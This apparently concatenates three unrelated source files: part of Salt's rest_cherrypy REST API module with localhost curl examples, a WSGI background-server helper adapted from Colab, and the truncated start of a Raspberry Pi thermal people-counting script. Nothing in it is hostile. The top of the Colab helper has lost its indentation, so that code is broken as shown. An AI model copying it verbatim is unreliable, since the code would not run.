        All SSH client requests are synchronous.

        **Example SSH client request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='ssh' \\
                -d tgt='*' \\
                -d username='saltdev' \\
                -d password='saltdev' \\
                -d eauth='auto' \\
                -d fun='test.ping'

        .. code-block:: text

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

        **Example SSH response:**

        .. code-block:: text

            return:
            - silver:
                _stamp: '2020-09-08T23:04:28.912609'
                fun: test.ping
                fun_args: []
                id: silver
                jid: '20200908230427905565'
                retcode: 0
                return: true
        """
        # No session token here -- eauth credentials or a token must be
        # embedded in the lowstate chunks themselves.
        results = self.exec_lowstate()
        return {
            "return": list(results),
        }
class Events:
    """
    Expose the Salt event bus
    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure.
    .. seealso:: :ref:`events`
    """

    exposed = True

    # Streaming response; auth is performed manually in GET, so the usual
    # salt_auth/hypermedia tools are disabled.
    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            "response.stream": True,
            "tools.encode.encoding": "utf-8",
            # Auth handled manually below
            "tools.salt_auth.on": False,
            "tools.hypermedia_in.on": False,
            "tools.hypermedia_out.on": False,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        # Used to verify Salt eauth tokens in _is_valid_token.
        self.resolver = salt.auth.Resolver(self.opts)

    def _is_valid_token(self, auth_token):
        """
        Check if this is a valid salt-api token or valid Salt token
        salt-api tokens are regular session tokens that tie back to a real Salt
        token. Salt tokens are tokens generated by Salt's eauth system.
        :return bool: True if valid, False if not valid.
        """
        # Make sure that auth token is hex. If it's None, or something other
        # than hex, this will raise a ValueError.
        try:
            int(auth_token, 16)
        except (TypeError, ValueError):
            return False
        # First check if the given token is in our session table; if so it's a
        # salt-api token and we need to get the Salt token from there.
        orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
        # If it's not in the session table, assume it's a regular Salt token.
        salt_token = orig_session.get("token", auth_token)
        # The eauth system does not currently support perms for the event
        # stream, so we're just checking if the token exists not if the token
        # allows access.
        if salt_token and self.resolver.get_token(salt_token):
            return True
        return False

    def GET(self, token=None, salt_token=None):
        r"""
        An HTTP stream of the Salt master event bus
        This stream is formatted per the Server Sent Events (SSE) spec. Each
        event is formatted as JSON.
        .. http:get:: /events
            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :query token: **optional** parameter containing the token
                ordinarily supplied via the X-Auth-Token header in order to
                allow cross-domain requests in browsers that do not include
                CORS support in the EventSource API. E.g.,
                ``curl -NsS localhost:8000/events?token=308650d``
            :query salt_token: **optional** parameter containing a raw Salt
                *eauth token* (not to be confused with the token returned from
                the /login URL). E.g.,
                ``curl -NsS localhost:8000/events?salt_token=30742765``
        **Example request:**
        .. code-block:: bash
            curl -NsS localhost:8000/events
        .. code-block:: text
            GET /events HTTP/1.1
            Host: localhost:8000
        **Example response:**
        Note, the ``tag`` field is not part of the spec. SSE compliant clients
        should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialze the
        JSON object each time.
        .. code-block:: text
            HTTP/1.1 200 OK
            Connection: keep-alive
            Cache-Control: no-cache
            Content-Type: text/event-stream;charset=utf-8
            retry: 400
            tag: salt/job/20130802115730568475/new
            data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
            tag: salt/job/20130802115730568475/ret/jerry
            data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
        The event stream can be easily consumed via JavaScript:
        .. code-block:: javascript
            var source = new EventSource('/events');
            source.onopen = function() { console.info('Listening ...') };
            source.onerror = function(err) { console.error(err) };
            source.onmessage = function(message) {
                var saltEvent = JSON.parse(message.data);
                console.log(saltEvent.tag, saltEvent.data);
            };
        Note, the SSE stream is fast and completely asynchronous and Salt is
        very fast. If a job is created using a regular POST request, it is
        possible that the job return will be available on the SSE stream before
        the response for the POST request arrives. It is important to take that
        asynchronicity into account when designing an application. Below are
        some general guidelines.
        * Subscribe to the SSE stream _before_ creating any events.
        * Process SSE events directly as they arrive and don't wait for any
          other process to "complete" first (like an ajax request).
        * Keep a buffer of events if the event stream must be used for
          synchronous lookups.
        * Be cautious in writing Salt's event stream directly to the DOM. It is
          very busy and can quickly overwhelm the memory allocated to a
          browser tab.
        A full, working proof-of-concept JavaScript application is available
        :blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
        It can be viewed by pointing a browser at the ``/app`` endpoint in a
        running ``rest_cherrypy`` instance.
        Or using CORS:
        .. code-block:: javascript
            var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
        It is also possible to consume the stream via the shell.
        Records are separated by blank lines; the ``data:`` and ``tag:``
        prefixes will need to be removed manually before attempting to
        unserialize the JSON.
        curl's ``-N`` flag turns off input buffering which is required to
        process the stream incrementally.
        Here is a basic example of printing each event as it comes in:
        .. code-block:: bash
            curl -NsS localhost:8000/events |\
                    while IFS= read -r line ; do
                        echo $line
                    done
        Here is an example of using awk to filter events based on tag:
        .. code-block:: bash
            curl -NsS localhost:8000/events |\
                    awk '
                        BEGIN { RS=""; FS="\\n" }
                        $1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
                    '
            tag: salt/job/20140112010149808995/new
            data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
            tag: 20140112010149808995
            data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
        """
        # Token precedence: explicit query params first, then the session
        # cookie set by /login.
        cookies = cherrypy.request.cookie
        auth_token = (
            token
            or salt_token
            or (cookies["session_id"].value if "session_id" in cookies else None)
        )
        if not self._is_valid_token(auth_token):
            raise cherrypy.HTTPError(401)
        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()
        # SSE response headers; the body is streamed by the generator below.
        cherrypy.response.headers["Content-Type"] = "text/event-stream"
        cherrypy.response.headers["Cache-Control"] = "no-cache"
        cherrypy.response.headers["Connection"] = "keep-alive"

        def listen():
            """
            An iterator to yield Salt events
            """
            with salt.utils.event.get_event(
                "master",
                sock_dir=self.opts["sock_dir"],
                opts=self.opts,
                listen=True,
            ) as event:
                stream = event.iter_events(full=True, auto_reconnect=True)
                # Ask SSE clients to retry after 400ms on disconnect.
                yield "retry: 400\n"
                while True:
                    data = next(stream)
                    # Non-standard "tag:" field lets clients filter without
                    # parsing the JSON payload (see docstring).
                    yield "tag: {}\n".format(data.get("tag", ""))
                    yield "data: {}\n\n".format(salt.utils.json.dumps(data))

        return listen()
class WebsocketEndpoint:
    """
    Open a WebSocket connection to Salt's event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure. Uses websocket as the transport mechanism.

    .. seealso:: :ref:`events`
    """

    exposed = True

    # Inherit the adapter's CherryPy config but disable the generic auth and
    # hypermedia tools: authentication is performed manually in GET() and the
    # response is a websocket stream, not a serialized body.
    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            "response.stream": True,
            "tools.encode.encoding": "utf-8",
            # Auth handled manually below
            "tools.salt_auth.on": False,
            "tools.hypermedia_in.on": False,
            "tools.hypermedia_out.on": False,
            "tools.websocket.on": True,
            "tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.auth = salt.auth.LoadAuth(self.opts)

    def GET(self, token=None, **kwargs):
        """
        Return a websocket connection of Salt's event stream

        .. http:get:: /ws/(token)

            :query format_events: The event stream will undergo server-side
                formatting if the ``format_events`` URL parameter is included
                in the request. This can be useful to avoid formatting on the
                client-side:

                .. code-block:: bash

                    curl -NsS <...snip...> localhost:8000/ws?format_events

            :reqheader X-Auth-Token: an authentication token from
                :py:class:`~Login`.

            :status 101: switching to the websockets protocol
            :status 401: |401|
            :status 406: |406|

        **Example request:** ::

            curl -NsSk \\
                -H 'X-Auth-Token: ffedf49d' \\
                -H 'Host: localhost:8000' \\
                -H 'Connection: Upgrade' \\
                -H 'Upgrade: websocket' \\
                -H 'Origin: https://localhost:8000' \\
                -H 'Sec-WebSocket-Version: 13' \\
                -H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
                localhost:8000/ws

        .. code-block:: text

            GET /ws HTTP/1.1
            Connection: Upgrade
            Upgrade: websocket
            Host: localhost:8000
            Origin: https://localhost:8000
            Sec-WebSocket-Version: 13
            Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
            X-Auth-Token: ffedf49d

        **Example response**:

        .. code-block:: text

            HTTP/1.1 101 Switching Protocols
            Upgrade: websocket
            Connection: Upgrade
            Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
            Sec-WebSocket-Version: 13

        An authentication token **may optionally** be passed as part of the URL
        for browsers that cannot be configured to send the authentication
        header or cookie:

        .. code-block:: bash

            curl -NsS <...snip...> localhost:8000/ws/ffedf49d

        The event stream can be easily consumed via JavaScript:

        .. code-block:: javascript

            // Note, you must be authenticated!
            var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
            source.onerror = function(e) { console.debug('error!', e); };
            source.onmessage = function(e) { console.debug(e.data); };

            source.send('websocket client ready')

            source.close();

        Or via Python, using the Python module `websocket-client
        <https://pypi.python.org/pypi/websocket-client/>`_ for example.

        .. code-block:: python

            # Note, you must be authenticated!
            from websocket import create_connection

            ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
            ws.send('websocket client ready')

            # Look at https://pypi.python.org/pypi/websocket-client/ for more
            # examples.
            while listening_to_events:
                print ws.recv()

            ws.close()

        Above examples show how to establish a websocket connection to Salt and
        activating real time updates from Salt's event stream by signaling
        ``websocket client ready``.
        """
        # Pulling the session token from an URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get("token")
        else:
            salt_token = cherrypy.session.get("token")

        # Manually verify the token
        if not salt_token or not self.auth.get_tok(salt_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        # A handler is the server side end of the websocket connection. Each
        # request spawns a new instance of this handler
        handler = cherrypy.request.ws_handler

        def event_stream(handler, pipe):
            """
            An iterator to return Salt events (and optionally format them)

            Runs in a child process; pushes each bus event to the websocket
            handler, either pre-formatted by SaltInfo or as a raw JSON frame.
            """
            # blocks until send is called on the parent end of this pipe.
            pipe.recv()
            with salt.utils.event.get_event(
                "master",
                sock_dir=self.opts["sock_dir"],
                opts=self.opts,
                listen=True,
            ) as event:
                stream = event.iter_events(full=True, auto_reconnect=True)
                SaltInfo = event_processor.SaltInfo(handler)

                def signal_handler(signal, frame):
                    # Child process: exit immediately on SIGTERM without
                    # running interpreter cleanup.
                    os._exit(0)

                signal.signal(signal.SIGTERM, signal_handler)
                while True:
                    data = next(stream)
                    if data:
                        try:  # work around try to decode catch unicode errors
                            if "format_events" in kwargs:
                                SaltInfo.process(data, salt_token, self.opts)
                            else:
                                handler.send(
                                    "data: {}\n\n".format(salt.utils.json.dumps(data)),
                                    False,
                                )
                        except UnicodeDecodeError:
                            logger.error(
                                "Error: Salt event has non UTF-8 data:\n%s", data
                            )

        parent_pipe, child_pipe = Pipe()
        handler.pipe = parent_pipe
        handler.opts = self.opts
        # Process to handle asynchronous push to a client.
        # Each GET request causes a process to be kicked off.
        proc = Process(target=event_stream, args=(handler, child_pipe))
        proc.start()
class Webhook:
    """
    A generic web hook entry point that fires an event on Salt's event bus

    External services can POST data to this URL to trigger an event in Salt.
    For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.

    .. note:: Be mindful of security

        Salt's Reactor can run any code. A Reactor SLS that responds to a hook
        event is responsible for validating that the event came from a trusted
        source and contains valid data.

        **This is a generic interface and securing it is up to you!**

        This URL requires authentication however not all external services can
        be configured to authenticate. For this reason authentication can be
        selectively disabled for this URL. Follow best practices -- always use
        SSL, pass a secret key, configure the firewall to only allow traffic
        from a known source, etc.

    The event data is taken from the request body. The
    :mailheader:`Content-Type` header is respected for the payload.

    The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
    appended to the end. For example, a ``POST`` request sent to
    ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
    ``salt/netapi/hook/mycompany/myapp/mydata``.

    The following is an example ``.travis.yml`` file to send notifications to
    Salt of successful test runs:

    .. code-block:: yaml

        language: python
        script: python -m unittest tests
        after_success:
            - |
                curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
                    -d branch="${TRAVIS_BRANCH}" \
                    -d commit="${TRAVIS_COMMIT}"

    .. seealso:: :ref:`events`, :ref:`reactor <reactor>`
    """

    exposed = True
    # Prefix segments for every event tag fired through this endpoint.
    tag_base = ["salt", "netapi", "hook"]

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            # Don't do any lowdata processing on the POST data
            # NOTE(review): the flag below is True, which appears to
            # contradict the comment above -- confirm the intended setting.
            "tools.lowdata_fmt.on": True,
            # Auth can be overridden in __init__().
            "tools.salt_auth.on": True,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        # Publisher-side handle on the master event bus, reused for the
        # lifetime of this endpoint instance.
        self.event = salt.utils.event.get_event(
            "master",
            sock_dir=self.opts["sock_dir"],
            opts=self.opts,
            listen=False,
        )
        if cherrypy.config["apiopts"].get("webhook_disable_auth"):
            # Mutates the class-level config dict so the auth tool is
            # disabled for this URL.
            self._cp_config["tools.salt_auth.on"] = False

    def POST(self, *args, **kwargs):
        """
        Fire an event in Salt with a custom event tag and data

        .. http:post:: /hook

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :status 413: request body is too large

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/hook \\
                -H 'Content-type: application/json' \\
                -d '{"foo": "Foo!", "bar": "Bar!"}'

        .. code-block:: text

            POST /hook HTTP/1.1
            Host: localhost:8000
            Content-Length: 16
            Content-Type: application/json

            {"foo": "Foo!", "bar": "Bar!"}

        **Example response**:

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 14
            Content-Type: application/json

            {"success": true}

        As a practical example, an internal continuous-integration build
        server could send an HTTP POST request to the URL
        ``https://localhost:8000/hook/mycompany/build/success`` which contains
        the result of a build and the SHA of the version that was built as
        JSON. That would then produce the following event in Salt that could be
        used to kick off a deployment via Salt's Reactor::

            Event fired at Fri Feb 14 17:40:11 2014
            *************************
            Tag: salt/netapi/hook/mycompany/build/success
            Data:
            {'_stamp': '2014-02-14_17:40:11.440996',
            'headers': {
                'X-My-Secret-Key': 'F0fAgoQjIT@W',
                'Content-Length': '37',
                'Content-Type': 'application/json',
                'Host': 'localhost:8000',
                'Remote-Addr': '127.0.0.1'},
            'post': {'revision': 'aa22a3c4b2e7', 'result': True}}

        Salt's Reactor could listen for the event:

        .. code-block:: yaml

            reactor:
              - 'salt/netapi/hook/mycompany/build/*':
                - /srv/reactor/react_ci_builds.sls

        And finally deploy the new build:

        .. code-block:: jinja

            {% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
            {% set build = data.get('post', {}) %}

            {% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
            deploy_my_app:
              cmd.state.sls:
                - tgt: 'application*'
                - arg:
                  - myapp.deploy
                - kwarg:
                    pillar:
                      revision: {{ build.revision }}
            {% endif %}
        """
        # The remaining URL path segments become the event tag suffix.
        tag = "/".join(itertools.chain(self.tag_base, args))
        data = cherrypy.serving.request.unserialized_data
        if not data:
            data = {}
        raw_body = getattr(cherrypy.serving.request, "raw_body", "")
        headers = dict(cherrypy.request.headers)
        ret = self.event.fire_event(
            {"body": raw_body, "post": data, "headers": headers}, tag
        )
        return {"success": ret}
class Stats:
    """
    Expose statistics on the running CherryPy server
    """

    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def __init__(self):
        # Operators may opt out of authentication for this endpoint via the
        # ``stats_disable_auth`` api option.
        disable_auth = cherrypy.config["apiopts"].get("stats_disable_auth")
        if disable_auth:
            self._cp_config["tools.salt_auth.on"] = False

    def GET(self):
        """
        Return a dump of statistics collected from the CherryPy server

        .. http:get:: /stats

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        """
        # cpstats publishes its counters on the ``logging`` module; when the
        # attribute is absent no stats have been collected.
        if not hasattr(logging, "statistics"):
            return {}
        return cpstats.extrapolate_statistics(logging.statistics)
class App:
    """
    Class to serve HTML5 apps
    """

    exposed = True

    def GET(self, *args):
        """
        Serve a single static file ignoring the remaining path

        This is useful in combination with a browser-based app using the HTML5
        history API.

        .. http:get:: /app

            :reqheader X-Auth-Token: |req_token|

            :status 200: |200|
            :status 401: |401|
        """
        apiopts = cherrypy.config["apiopts"]
        # Fall back to the index.html shipped next to this module when no
        # custom "app" entry point is configured.
        module_dir = os.path.dirname(__file__)
        default_index = os.path.abspath(os.path.join(module_dir, "index.html"))
        return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
    """
    Collect configuration and URL map for building the CherryPy app
    """

    # Static mapping of URL path segment -> handler class; extended at
    # runtime by _update_url_map().
    url_map = {
        "index": LowDataAdapter,
        "login": Login,
        "logout": Logout,
        "token": Token,
        "minions": Minions,
        "run": Run,
        "jobs": Jobs,
        "keys": Keys,
        "events": Events,
        "stats": Stats,
    }

    def _setattr_url_map(self):
        """
        Set an attribute on the local instance for each key/val in url_map

        CherryPy uses class attributes to resolve URLs.
        """
        if self.apiopts.get("enable_sessions", True) is False:
            # These endpoints depend on sessions and are withheld when
            # sessions are disabled.
            url_blacklist = ["login", "logout", "minions", "jobs"]
        else:
            url_blacklist = []
        urls = (
            (url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
        )
        for url, cls in urls:
            setattr(self, url, cls())

    def _update_url_map(self):
        """
        Assemble any dynamic or configurable URLs
        """
        if HAS_WEBSOCKETS:
            self.url_map.update({"ws": WebsocketEndpoint})
        # Allow the Webhook URL to be overridden from the conf.
        self.url_map.update(
            {self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
        )
        # Enable the single-page JS app URL.
        self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.apiopts = cherrypy.config["apiopts"]
        self._update_url_map()
        self._setattr_url_map()

    def get_conf(self):
        """
        Combine the CherryPy configuration with the rest_cherrypy config values
        pulled from the master config and return the CherryPy configuration
        """
        conf = {
            "global": {
                "server.socket_host": self.apiopts.get("host", "0.0.0.0"),
                "server.socket_port": self.apiopts.get("port", 8000),
                "server.thread_pool": self.apiopts.get("thread_pool", 100),
                "server.socket_queue_size": self.apiopts.get("queue_size", 30),
                "max_request_body_size": self.apiopts.get(
                    "max_request_body_size", 1048576
                ),
                "debug": self.apiopts.get("debug", False),
                "log.access_file": self.apiopts.get("log_access_file", ""),
                "log.error_file": self.apiopts.get("log_error_file", ""),
            },
            "/": {
                "request.dispatch": cherrypy.dispatch.MethodDispatcher(),
                "tools.trailing_slash.on": True,
                "tools.gzip.on": True,
                "tools.html_override.on": True,
                "tools.cors_tool.on": True,
            },
        }
        if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
            # CherryPy >= 12.0 no longer supports "timeout_monitor", only set
            # this config option when using an older version of CherryPy.
            # See Issue #44601 for more information.
            conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
                "expire_responses", True
            )
        if cpstats and self.apiopts.get("collect_stats", False):
            conf["/"]["tools.cpstats.on"] = True
        if "favicon" in self.apiopts:
            conf["/favicon.ico"] = {
                "tools.staticfile.on": True,
                "tools.staticfile.filename": self.apiopts["favicon"],
            }
        if self.apiopts.get("debug", False) is False:
            conf["global"]["environment"] = "production"
        # Serve static media if the directory has been set in the configuration
        if "static" in self.apiopts:
            conf[self.apiopts.get("static_path", "/static")] = {
                "tools.staticdir.on": True,
                "tools.staticdir.dir": self.apiopts["static"],
            }
        # Add to global config
        cherrypy.config.update(conf["global"])
        return conf
def get_app(opts):
    """
    Returns a WSGI app and a configuration dictionary
    """
    # The second-to-last component of this module's dotted name is the
    # "rest_cherrypy" section of the master config.
    api_opts = opts.get(__name__.rsplit(".", 2)[-2], {})

    # Make Salt and salt-api config options reachable from CherryPy handlers.
    cherrypy.config["saltopts"] = opts
    cherrypy.config["apiopts"] = api_opts

    app_root = API()  # cherrypy app
    return app_root, api_opts, app_root.get_conf()
|
_background_server.py | # Note: the code in this file is adapted from source at
# https://github.com/googlecolab/colabtools/blob/master/google/colab/html/_background_server.py
# The following is its original license:
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WSGI server utilities to run in thread. WSGI chosen for easier interop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import socket
import threading
import wsgiref.simple_server
import portpicker
def _set_new_event_loop():
if not six.PY2:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
def _build_server(started, stopped, stopping, timeout):
    """Create the thread target that runs a WSGI server until told to stop.

    Args:
      started: threading.Event set once the server is accepting requests.
      stopped: threading.Event set after the serve loop exits.
      stopping: threading.Event that callers set to request shutdown.
      timeout: Http timeout in seconds.

    Returns:
      A callable ``server(port, wsgi_app)`` suitable for use as a
      threading.Thread target; it reports status via the events above.
    """

    def server(port, wsgi_app):
        """Serve *wsgi_app* on *port* until the stopping event is set.

        Args:
          port: Port number to serve on.
          wsgi_app: WSGI application to serve.
        """
        host = ''  # Bind to all.
        make = wsgiref.simple_server.make_server
        try:
            httpd = make(host, port, wsgi_app,
                         handler_class=SilentWSGIRequestHandler)
        except socket.error:
            # The default (IPv4) bind failed; retry with the IPv6-capable
            # server class.
            httpd = make(host, port, wsgi_app,
                         server_class=_WSGIServerIPv6,
                         handler_class=SilentWSGIRequestHandler)
        _set_new_event_loop()
        started.set()
        httpd.timeout = timeout
        while not stopping.is_set():
            httpd.handle_request()
        stopped.set()

    return server
class SilentWSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
    """WSGIRequestHandler that generates no logging output.

    Overrides the base handler's per-request logging with a no-op so the
    background server stays quiet.
    """

    def log_message(self, fmt, *args):
        """Suppress request logging (base class writes to stderr).

        The parameter is renamed from the base class's ``format`` to avoid
        shadowing the builtin; the framework calls it positionally.
        """
        pass
class _WSGIServerIPv6(wsgiref.simple_server.WSGIServer):
    """IPv6 based extension of the simple WSGIServer."""

    # Listen on AF_INET6 sockets instead of the WSGIServer default (AF_INET);
    # used as a fallback when the IPv4 bind raises socket.error.
    address_family = socket.AF_INET6
class _WsgiServer(object):
    """Wsgi server.

    Runs a WSGI application on a background thread and coordinates
    startup/shutdown with that thread via threading.Event objects.
    """

    def __init__(self, wsgi_app):
        """Initialize the WsgiServer.

        Args:
          wsgi_app: WSGI pep-333 application to run.
        """
        self._app = wsgi_app
        # Thread running the serve loop; None while the server is stopped.
        self._server_thread = None
        # Threading.Event objects used to communicate about the status
        # of the server running in the background thread.
        # These will be initialized after building the server.
        self._stopped = None
        self._stopping = None

    @property
    def wsgi_app(self):
        """Returns the wsgi app instance."""
        return self._app

    @property
    def port(self):
        """Returns the current port or error if the server is not started.

        Raises:
          RuntimeError: If server has not been started yet.
        Returns:
          The port being used by the server.
        """
        if self._server_thread is None:
            raise RuntimeError('Server not running.')
        return self._port

    def stop(self):
        """Stops the server thread."""
        if self._server_thread is None:
            # Already stopped (or never started); nothing to do.
            return
        # Signal the serve loop to exit, then wait for its acknowledgement.
        # NOTE(review): the loop may block inside handle_request() for up to
        # the configured timeout before it notices the stopping event.
        self._stopping.set()
        self._server_thread = None
        self._stopped.wait()

    def start(self, port=None, timeout=1):
        """Starts a server in a thread using the WSGI application provided.

        Will wait until the thread has started calling with an already serving
        application will simple return.

        Args:
          port: Number of the port to use for the application, will find an open
            port if one is not provided.
          timeout: Http timeout in seconds.
        """
        if self._server_thread is not None:
            # Already serving; calling start() again is a no-op.
            return
        started = threading.Event()
        self._stopped = threading.Event()
        self._stopping = threading.Event()
        wsgi_app = self.wsgi_app
        server = _build_server(started, self._stopped, self._stopping, timeout)
        if port is None:
            self._port = portpicker.pick_unused_port()
        else:
            self._port = port
        server_thread = threading.Thread(target=server, args=(self._port, wsgi_app))
        self._server_thread = server_thread
        server_thread.start()
        # Block until the server thread reports it is accepting requests.
        started.wait()
|
thermal_save_csv.py | import pygame
import os
import math
import datetime
from datetime import datetime, date
import time
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import busio
import board
import adafruit_amg88xx
import functools
from functools import cmp_to_key
import json
import argparse
import csv
import threading
from trackableobject import TrackableObject
# some utility functions
def constrain(val, min_val, max_val):
    """Clamp ``val`` into the inclusive range [min_val, max_val]."""
    return max(min_val, min(val, max_val))
def map_value(x, in_min, in_max, out_min, out_max):
    """Linearly rescale ``x`` from [in_min, in_max] onto [out_min, out_max].

    The arithmetic order matches the classic Arduino ``map()`` formula so
    floating-point results are bit-identical to the original.
    """
    in_span = in_max - in_min
    out_span = out_max - out_min
    return (x - in_min) * out_span / in_span + out_min
def get_filepath(relative_filepath):
    """Return a path for *relative_filepath* under the project data root.

    The path is resolved against the fixed directory
    ``/home/pi/git/pedestrian-counter/data``; no filesystem access occurs.
    (The local was renamed from ``dir``, which shadowed the builtin.)

    Args:
        relative_filepath: path fragment to append to the data root.
    Returns:
        The joined path string.
    """
    # os.path.dirname strips the trailing slash component, yielding the
    # data directory itself.
    base_dir = os.path.dirname('/home/pi/git/pedestrian-counter/data/')
    return os.path.join(base_dir, relative_filepath)
def csv_save_append(row):
    """Append *row* as one CSV record to the shared data.csv file.

    Args:
        row: iterable of values written as a single CSV line.
    """
    datapath = str(get_filepath('../data/') + 'data.csv')
    # newline='' is required by the csv module: without it the writer can
    # emit extra blank lines on platforms with \r\n line endings.
    # (The parameter was renamed from ``list``, which shadowed the builtin;
    # the only caller passes it positionally.)
    with open(datapath, 'a', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(row)
def csv_save(delay):
    """Persist the global ``payload`` to CSV every *delay* seconds, forever.

    Intended to run on a background thread.  Each cycle spawns a short-lived
    child process that appends the current payload, after first terminating
    any previous saver process that is still running so file writes never
    overlap.

    Args:
        delay: seconds to sleep between saves.
    """
    global payload
    while True:
        # Kill a still-running saver from the previous cycle, if any.
        for child in active_children():
            if child.name == 'csv_proc':
                child.terminate()
        proc = Process(
            target=csv_save_append, name='csv_proc', args=(payload, ))
        proc.start()
        print("Saved to CSV.")
        time.sleep(delay)
def count_within_range(list1, l, r):
    '''
    Count how many numbers in list1 fall into the inclusive range [l, r].

    Args:
        list1: iterable of numbers to test.
        l: lower bound (inclusive).
        r: upper bound (inclusive).
    Returns:
        The number of elements x with l <= x <= r.
    '''
    # Generator expression replaces the original manual counter loop.
    return sum(1 for x in list1 if l <= x <= r)
# Timestamp of process start; reused in every CSV row to identify this run.
timestart = str(datetime.now().isoformat())
# Shared row consumed by the csv_save thread:
# [current time, run start time, total "up" count, total "down" count].
payload = [str(datetime.now().isoformat()), timestart, 0, 0]
def main():
    """Run the thermal pedestrian counter.

    Reads frames from an AMG88xx 8x8 thermal sensor, upscales them with
    bicubic interpolation, renders them via pygame, detects blobs with
    OpenCV, tracks centroids, and counts objects crossing the horizontal
    center line ("up"/"down").  Results are written to CSV on a background
    thread via the module-global ``payload``.
    """
    global payload
    global timestart
    # argument parsing
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--headless', help='run the pygame headlessly', action='store_true')
    parser.add_argument(
        "--color_depth", help="integer number of colors to use to draw temps", type=int)
    parser.add_argument(
        '--max_temp', help='initial max temperature', type=int)
    parser.add_argument(
        '--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
    parser.add_argument(
        '--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
    parser.add_argument(
        '--blob_min_threshold', help='blod detection min threshold', type=int)
    parser.add_argument(
        '--blob_max_threshold', help='blod detection min threshold', type=int)
    parser.add_argument(
        '--blob_filterbyarea', help='blod detection filter by area', action='store_true')
    parser.add_argument(
        '--blob_min_area', help='blod detection filter by area min area', type=int)
    parser.add_argument(
        '--blob_filterbycircularity', help='blod detection filter by circularity', action='store_true')
    parser.add_argument(
        '--blob_min_circularity', help='blod detection filter by circularity min circularity', type=float)
    parser.add_argument(
        '--blob_filterbyconvexity', help='blod detection filter by convexity', action='store_true')
    parser.add_argument(
